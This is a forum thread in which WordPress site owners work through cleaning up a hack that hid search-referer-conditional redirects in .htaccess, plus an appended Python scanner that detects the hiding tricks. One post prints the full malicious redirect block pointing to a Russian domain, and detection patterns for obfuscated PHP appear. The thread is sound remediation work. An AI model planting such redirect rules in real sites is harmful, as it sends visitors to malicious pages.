Malware disaster - please help


#1

hi,
Yesterday, one of our domains was blacklisted by Google safe browsing (o-fu-online.net). You can see the diag here:
http://www.google.com/safebrowsing/diagnostic?site=o-fu-online.net

I’ve spent about 10hrs attempting to repair this, however I’ve not had much luck. In the end I’ve reverted to an older backup and partially fixed the site by adjusting .htaccess, but I’ve yet to confirm if I’ve managed to remove the infection entirely. The main site seems to be clean now, but the admin page of the WordPress blog is still redirecting to a Russian site and I’m unable to access parts of the admin console (such as the add new plugin page, so I can’t install anti-malware tools).

If you notice on the diag page, it says: “This site was hosted on 1 network(s) including AS26347 (DREAMHOST)”

if you click that link, it takes you to the diags for the host, which alarmingly advises
"Over the past 90 days, we found 234 site(s) on this network, including, for example, ethisearch.com/, apt518.com/, your-nyc.com/, that appeared to function as intermediaries for the infection of 567 other site(s) including, for example, tutorialkit.com/, stumbleupon.com/, unmicroclima.com/."

So it appears there are other sites on the same host with issues. Is this a server side exploit? I’m stuck with what to do next to be honest. I’ve even overwritten the .htaccess with a blank file and still:

web site: o-fu-online.net
status: Site infected with malware
web trust: Site blacklisted.

Malware found in the URL:
http://www.o-fu-online.net//404testpage4525d2fdc

Known javascript malware.
Details: http://sucuri.net/malware/malware-entry-mwhta7

The document has moved here.

Malware found in the URL: http://www.o-fu-online.net/feed/

Suspicious conditional redirect on:
http://www.o-fu-online.net/


#2

Unfortunately your site is still hacked. When pages on your site are requested they are still doing a conditional redirect to http:// now-protect . ru /accaunt/index.php?cat=61 if the referring page is Google, for example from a search results page.

You can use an on line tool like http://redleg-redleg.com/file-viewer/ that allows you to set the referring page to google.com and check for this type of redirect.

Suggest you take another look at the .htaccess file. When checking the file be sure to scroll all the way to the bottom of the file. With this hack the hackers have been adding 100s of blank lines then “tabbing” the malicious lines way over in an attempt to hide them.


#3

thanks for the speedy response. I will take a look at the .htaccess again now and report back.

OK. The .htaccess in the root folder is 0 bytes as I’ve completely dumped it, however the problem still exists! How is that even possible?


#4

With a WordPress site the next thing to check is your PHP code in your core PHP files. The malicious code will no doubt be obfuscated: a line of PHP code that starts out eval(base64_decode(' then a long string of seemingly random characters. There are some tips on where to start looking in this blogpost http://redleg-redleg.blogspot.com/2011/01/redirect-to-malicious-site.html


#5

You most likely have more .htaccess files. If your user has shell access, log in and type

[code]find . -name ".htaccess" -print | more[/code]

It may take a minute and act like it’s frozen, but let it go…


#6

Hi there

I found your forum because I too have been hacked by these X*! It started with emails being sent out using my email addresses - then I discovered this was happening on two hosts!

So I changed all passwords on cpanel and deleted a variety of emails.

Then I discovered an error on a couple of sites so deleted the plugins that seemed to be causing this - the timthumb element came up here.

Now today that annoying redirect has hit so far - 5 sites! 2 in the last hour. I have now requested that my two hosts reinstall backups for all sites! I sincerely hope they will comply and help me to prevent this spreading further. Do you think reinstalling backups will remove the offending xi!!


#7

Thanks for the replies. I’m trying to get some time to work through this. Out of interest, how has this happened? Is it a DreamHost issue? The number of sites on their network with infections is astonishing.


#8

It can’t be a DreamHost issue because the two hosts I am talking about are not DreamHost. I am with Bluehost and Herohost.

I am hoping someone can tell me if using backups from a day or two before this kicked off will remove all the offending hacks?

I still don’t know how this happened but I did notice that piwik is also being targeted and I had a list of my sites on their system which is a replacement for google analytics

I also have VA’s working in PH and have shared docs on Google Docs with site information - could this have been where they got the information, or Piwik?

Does anyone have any idea why my sites were vulnerable?


#9

Just to clarify, I was meaning “is this a server side exploit” rather than a code/user issue. The research I’ve done since I posted the previous comment leads me to believe this is related to an exploit in a component of WordPress themes.


#10

Hi again

I have been told it is likely to be a vulnerability in WordPress - I’m still hoping someone can tell me how to scan my sites safely to find the vulnerability so I can remove it once my sites are restored?


#11

Firstly, I must say again thanks VERY MUCH to the people in this thread for the help on this matter. :slight_smile:

As some form of attempt at repayment, I’ve written the following guide to help others and I will continue to return to this topic to help.

I’ve just cleaned 3 of my sites. It’s gone and everything is checking out. I’m still working on it now.

Here’s my guide so far:

  1. change host password via dreamhost panel

  2. change all user passwords via dreamhost panel

  3. use the webftp to set the permissions to read/write on the .htaccess file in the ROOT account folder.

  4. open the file in the viewer of the panel.

  5. if there are any lines at the top of the file such as:

[code]# BEGIN WordPress
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
# END WordPress[/code]

copy them somewhere.

  6. If you look towards the middle of the file (scroll down and across) you will find the conditional redirects put in by the malware. It will look like this:

[code]ErrorDocument 400 http://now-protect.ru/accaunt/index.php
ErrorDocument 401 http://now-protect.ru/accaunt/index.php
ErrorDocument 403 http://now-protect.ru/accaunt/index.php
ErrorDocument 404 http://now-protect.ru/accaunt/index.php
ErrorDocument 500 http://now-protect.ru/accaunt/index.php
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
RewriteCond %{HTTP_REFERER} .*youtube.* [OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]
RewriteCond %{HTTP_REFERER} .*qq.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]
RewriteCond %{HTTP_REFERER} .*facebook.* [OR]
RewriteCond %{HTTP_REFERER} .*twitter.* [OR]
RewriteCond %{HTTP_REFERER} .*blog.* [OR]
RewriteCond %{HTTP_REFERER} .*live.* [OR]
RewriteCond %{HTTP_REFERER} .*myspace.* [OR]
RewriteCond %{HTTP_REFERER} .*mail.* [OR]
RewriteCond %{HTTP_REFERER} .*yandex.* [OR]
RewriteCond %{HTTP_REFERER} .*rambler.* [OR]
RewriteCond %{HTTP_REFERER} .*ya.* [OR]
RewriteCond %{HTTP_REFERER} .*aport.* [OR]
RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ http://now-protect.ru/accaunt/index.php [R=301,L]
</IfModule>[/code]

  7. Press ctrl+A in the editor window to select the whole file. Delete it. Then save the file. Paste the valid content back in and save again.

  8. Repeat step 4. Ensure that the dodgy content has been removed and that your valid content (if any) is still there.

  9. Chmod the .htaccess file back to read permission only.

  10. Repeat this procedure (steps 1-9) on the .htaccess file in any site folders you have.

  11. Check your site using these 2 tools:
    http://redleg-redleg.com/file-viewer/
    http://sitecheck.sucuri.net/scanner/

  12. Ensure latest WordPress updates are on and ensure you don’t still have a vulnerable copy of the timthumb script which is used by certain themes. Woothemes provide updates via the control panel menu, so I ran that in. (This is specific to the supplier of the theme.)

That seems to have done the trick for me. I’m now examining the actual php/java content before attempting a Google Safe Browsing rescan request.

:smiley:
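The .htaccess tricks described in #2 and #11 (hundreds of blank lines, directives tabbed far to the right, referer-conditional redirects and ErrorDocument lines pointing off-site) and the eval(base64_decode( marker from #4 can all be checked for mechanically. The following is an added example, not code from anyone in this thread; the sample file content and the redirect-target.invalid host are constructed for the demonstration.

```python
import re

# Constructed sample, not from the thread: the legitimate WordPress block, then
# hundreds of blank lines, then tab-indented directives pointing at a placeholder host.
CLEAN = """# BEGIN WordPress
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
# END WordPress
"""
HIDDEN = "\n" * 300 + "".join("\t\t\t\t\t\t" + d + "\n" for d in (
    "ErrorDocument 404 http://redirect-target.invalid/index.php",
    "RewriteCond %{HTTP_REFERER} .*google.* [OR]",
    "RewriteCond %{HTTP_REFERER} .*bing.*",
    "RewriteRule ^(.*)$ http://redirect-target.invalid/index.php [R=301,L]"))
INFECTED = CLEAN + HIDDEN

EXTERNAL = re.compile(r"^\s*(ErrorDocument\s+\d{3}|RewriteRule\s+\S+)\s+(https?://\S+)", re.I)
REFERER = re.compile(r"^\s*RewriteCond\s+%\{HTTP_REFERER\}", re.I)
PHP_OBF = re.compile(r"eval\s*\(\s*(base64_decode|gzinflate|str_rot13)\s*\(", re.I)

def scan_htaccess(text, blank_run=50, indent=4):
    """Return (line_no, reason) findings for one .htaccess body."""
    findings, blanks, after_referer = [], 0, False
    for no, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            blanks += 1
            continue
        if blanks >= blank_run:  # padding used to push content below the visible area
            findings.append((no, f"directive after {blanks} blank lines"))
        blanks = 0
        if line.startswith("\t") or len(line) - len(line.lstrip()) >= indent:
            findings.append((no, "directive indented far to the right"))
        if REFERER.match(line):  # referer conditions chain onto the following rule
            after_referer = True
            continue
        m = EXTERNAL.match(line)
        if m:
            kind = "referer-conditional redirect" if after_referer else "redirect"
            findings.append((no, f"{kind} to external URL {m.group(2)}"))
        after_referer = False
    return findings

def scan_php(text):
    """Line numbers holding eval(base64_decode( style obfuscated PHP (post #4)."""
    return [no for no, line in enumerate(text.splitlines(), 1) if PHP_OBF.search(line)]
```

Run scan_htaccess over every .htaccess that the find command in #5 lists and scan_php over the core PHP files; a clean WordPress block yields no findings, while the padded sample is flagged on every hidden line.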


#12

resubmitted the google scan and everything is now clear again… no more malware :smiley: